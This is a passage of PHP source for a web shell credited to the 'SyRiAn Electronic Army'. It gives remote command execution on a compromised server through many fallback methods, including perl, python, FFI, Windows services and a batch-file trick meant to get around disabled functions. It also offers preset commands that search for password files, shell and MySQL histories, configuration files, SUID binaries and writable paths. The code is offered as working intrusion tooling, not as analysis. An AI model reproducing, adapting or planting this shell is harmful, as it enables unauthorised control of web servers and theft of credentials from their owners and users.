769.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
770.     else {$safe_mode = '<font color="red">ON</font>';}
771.     return $safe_mode;
772. }
773. function DisableFunctions() {
774.     $disfun = ini_get('disable_functions');
775.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
776. }
777. function RegisterGlobals() {
778.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
779.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
780. }
781. function GetRealIP() {
782.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
783.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
784.     else {$ip=getenv(REMOTE_ADDR);}
785.     return $ip;
786. }
787. function SelectCommand($os) {
788.     global $os;
789.     if($os == 'Windows') {
790.         echo "
791.         <select name='alias' id='alias' onChange='AddAlias();' >
792.         <option value=''>NONE</option> 
793.         <option value='dir' >List Directory</option>
794.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
795.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
796.         <option value='netstat -an'>Show active connections</option>
797.         <option value='net start'>Show running services</option>
798.         <option value='tasklist'>Show Pro</option>
799.         <option value='net user'>User accounts</option>
800.         <option value='net view'>Show computers</option>
801.         <option value='arp -a'>ARP Table</option>
802.         <option value='ipconfig /all'>IP Configuration</option>
803.         <option value='netstat -an'>netstat -an</option>
804.         <option value='systeminfo'>System Informations</option>
805.         <option value='getmac'>Get Mac Address</option>
806.         </select>
807.         ";
808.     }
809.     else {
810.         echo "
811.         <select name='alias' id='alias' onChange='AddAlias();' >
812.         <option value=''>NONE</option> 
813.         <option value='ls -la'>List dir</option>
814.         <option value='cat /etc/hosts'>IP Addresses</option>
815.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
816.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
817.         <option value='netstat -an | grep -i listen'>show opened ports</option>
818.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
819.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
820.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
821.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
822.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
823.         <option value='find / -type f -name \"config*\"'>find config* files</option>
824.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
825.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
826.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
827.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
828.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
829.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
830.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
831.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
832.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
833.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
834.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
835.         <option value='locate httpd.conf'>locate httpd.conf files</option>
836.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
837.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
838.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
839.         <option value='locate my.conf'>locate my.conf files</option>
840.         <option value='locate admin.php'>locate admin.php files</option>
841.         <option value='locate cfg.php'>locate cfg.php files</option>
842.         <option value='locate conf.php'>locate conf.php files</option>
843.         <option value='locate config.dat'>locate config.dat files</option>
844.         <option value='locate config.php'>locate config.php files</option>
845.         <option value='locate config.inc'>locate config.inc files</option>
846.         <option value='locate config.inc.php'>locate config.inc.php</option>
847.         <option value='locate config.default.php'>locate config.default.php files</option>
848.         <option value='locate config'>locate config* files </option>
849.         <option value='locate \".conf\"'>locate .conf files</option>
850.         <option value='locate \".pwd\"'>locate .pwd files</option>
851.         <option value='locate \".sql\"'>locate .sql files</option>
852.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
853.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
854.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
855.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
856.         <option value='locate backup'>locate backup files</option>
857.         <option value='locate dump'>locate dump files</option>
858.         <option value='locate priv'>locate priv files</option>
859.         </select>
860.         ";
861.     }
862. }
863. function CSS($sh3llColor) {
864.     $css =  "
865.     <style>
866.     BODY
867.     {
868.         FONT-FAMILY: Verdana;
869.         margin: 2;
870.         background-color: #000000;
871.         color:white;
872.         font-size:10pt;
873.     }
874.     sy  
875.     {
876.         color:".$sh3llColor.";
877.         font-size:7pt;
878.     }
879.     #Box
880.     {
881.         color:".$sh3llColor.";
882.         background-color:#000;
883.         font-size:14px;
884.         font-weight:bold;
885.  
886.         border:none;
887.     }
888.     table
889.     {
890.         border:none;
891.         BORDER:  #eeeeee  outset;
892.         BACKGROUND-COLOR: #000000;
893.         color: #cccccc;
894.         font-size:10px;
895.     }
896.     tr
897.     {
898.         BORDER-RIGHT:  #cccccc 1px solid;
899.         BORDER-TOP:    #cccccc 1px solid;
900.         BORDER-LEFT:   #cccccc 1px solid;
901.         BORDER-BOTTOM: #cccccc 1px solid;
902.         color: #ffffff;
903.     }
904.     td
905.     {
906.         BORDER-RIGHT:  #cccccc 1px solid;
907.         BORDER-TOP:    #cccccc 1px solid;
908.         BORDER-LEFT:   #cccccc 1px solid;
909.         BORDER-BOTTOM: #cccccc 1px solid;
910.         color: #cccccc;
911.     }
912.  
913.     input
914.     {
915.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
916.         BORDER-TOP:    ".$sh3llColor." 1px solid;
917.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
918.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
919.         BACKGROUND-COLOR: #333333;
920.         font: 9pt tahoma;
921.         color: #ffffff;
922.     }
923.     select
924.     {
925.         BORDER-RIGHT:  #ffffff 1px solid;
926.         BORDER-TOP:    #999999 1px solid;
927.         BORDER-LEFT:   #999999 1px solid;
928.         BORDER-BOTTOM: #ffffff 1px solid;
929.         BACKGROUND-COLOR: #000000;
930.         font: 9pt tahoma;
931.         color: #CCCCCC;;
932.     }
933.     submit
934.     {
935.         BORDER:  1px outset buttonhighlight;
936.         BACKGROUND-COLOR: #272727;
937.         width: 40%;
938.         color: #cccccc;
939.     }
940.     textarea
941.     {
942.         BORDER-RIGHT:  #ffffff 1px solid;
943.         BORDER-TOP:    #999999 1px solid;
944.         BORDER-LEFT:   #999999 1px solid;
945.         BORDER-BOTTOM: #ffffff 1px solid;
946.         BACKGROUND-COLOR: #333333;
947.         color: #ffffff;
948.     }
949.     .Save{
950.         width:500px;   
951.         border-color:red;
952.     }
953.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
954.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
955.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
956.     A:hover {color:blue;TEXT-DECORATION: none;}
957.     </style>
958.     <script>
959.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
960.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
961.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
962.     function change_dir_mode() {
963.         var dir_mode = document.getElementById('dir_mode').value;
964.         document.location = '?dir_mode='+dir_mode;
965.     }
966.     </script>
967.     ";
968.     return $css;
969. }
970. function filter($string) {
971.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
972.     else{return $string;    }
973. }
974. function footer() {
975.     echo '
976.     <table width="100%">
977.     <tr>
978.     <td width="100%"><center>
979.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
980.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
981.     <sy>  ~~<< </sy>[email protected]<sy> >>~~</sy></b>
982.     </center></td>
983.     </tr>
984.     </table>
985.     </body></html>
986.     ';
987. }
988. function print_exe_method() {
989.     global $os; global $exec_method;
990.     if($os == "Linux") {
991.         ?>
992.         <select name="exe_method" >
993.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
994.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
995.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
996.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
997.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
998.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
999.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1000.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1001.         </select>
1002.         <?php
1003.     } else {
1004.         ?>
1005.         <select name="exe_method" >
1006.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
1007.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
1008.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
1009.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1010.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1011.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1012.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
1013.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
1014.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
1015.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1016.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1017.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
1018.         </select>
1019.         <?php
1020.     }
1021. }
1022. function Exe($command) {
1023.     global $dir;global $os;global $exec_method;
1024.     $command = filter($command);
1025.    
1026.     if($exec_method == "exec") {
1027.         exec($command,$output);echo join("\n",$output);
1028.     } else if($exec_method == "system") {
1029.         system($command);
1030.     } else if($exec_method == "shell_exec") {
1031.         echo shell_exec($command);
1032.     } else if($exec_method == "passthru") {
1033.         passthru($command);
1034.     } else if($exec_method == "proc_open") {
1035.         echo proc_exec($command,$dir);
1036.     } else if($exec_method == "popen") {
1037.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
1038.     } else if($exec_method == "win_shell_execute") {
1039.         echo winshell($command);
1040.     } else if($exec_method == "win32_create_service") {
1041.         echo srvshell($command);
1042.     } else if($exec_method == "ffi") {
1043.         echo ffishell($command);
1044.     } else if($exec_method == "perl") {
1045.         echo perlshell($command);
1046.     } else if($exec_method == "python") {
1047.         echo python_eval("import os\nos.system('".$command."')");
1048.     } else if($exec_method == "slash_bypass") {
1049.         echo slashBypass($command);
1050.     }
1051. }
1052. function proc_exec($com , $dir) {
1053.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
1054.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
1055.     return stream_get_contents($pipes[1]);
1056. }
1057. function winshell($command) {
1058.     $name=whereistmP()."\\".uniqid('NJ');
1059.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
1060.     sleep(1);
1061.     $exec=file_get_contents($name);
1062.     DeleteFile($name);
1063.     return $exec;
1064. }
1065. function srvshell($command) {
1066.     $name=whereistmP()."\\".uniqid('NJ');
1067.     $n=uniqid('NJ');
1068.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
1069.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
1070.     win32_start_service($n);
1071.     win32_stop_service($n);
1072.     win32_delete_service($n);
1073.     while(!file_exists($name))sleep(1);
1074.     $exec=file_get_contents($name);
1075.     DeleteFile($name);
1076.     return $exec;
1077. }
1078. function ffishell($command) {
1079.     $name=whereistmP()."\\".uniqid('NJ');
1080.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
1081.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
1082.     while(!file_exists($name))sleep(1);
1083.     $exec=file_get_contents($name);
1084.     DeleteFile($name);
1085.     return $exec;
1086. }
1087. function perlshell($command) {
1088.     $perl=new perl();
1089.     ob_start();
1090.     $perl->eval("system('".$command."')");
1091.     $exec=ob_get_contents();
1092.     ob_end_clean();
1093.     return $exec;
1094. }
1095. function slashBypass($cmd) {
1096.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
1097.     exec("\start cmd.bat");
1098.     $content = file_get_contents('sy3.txt');
1099.     unlink('sy3.txt');
1100.     return $content;
1101. }
1102. function GenerateFile($name,$content) {
1103.     if(function_exists('fopen') && function_exists('fclose')) {
1104.         $file = fopen($name,"w+");
1105.         if($file) {
1106.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
1107.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
1108.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
1109.             if(!$writeFile){return false;}
1110.         }
1111.         else{return false;}fclose($file);return true;
1112.     }
1113. }
1114. function ScanDirs() {
1115.     global $os; global $dir;global $safeMode;global $dir_mode;
1116.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
1117.     else {
1118.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
1119. -----------------------------------------------------------------------------
1120. ";
1121.         $handel = opendir($dir);
1122.         while(($file = readdir($handel))!= false)
1123.         {
1124.             $size = filesize($file);
1125.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
1126.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
1127.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
1128.             $perms = fileperms($file);
1129.             $time = date("y/m/d", filectime($file));
1130.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
1131.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
1132.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
1133. ";
1134.         }
1135.     }
1136.     return $result;
1137. }
1138. echo footer();
1139. ?>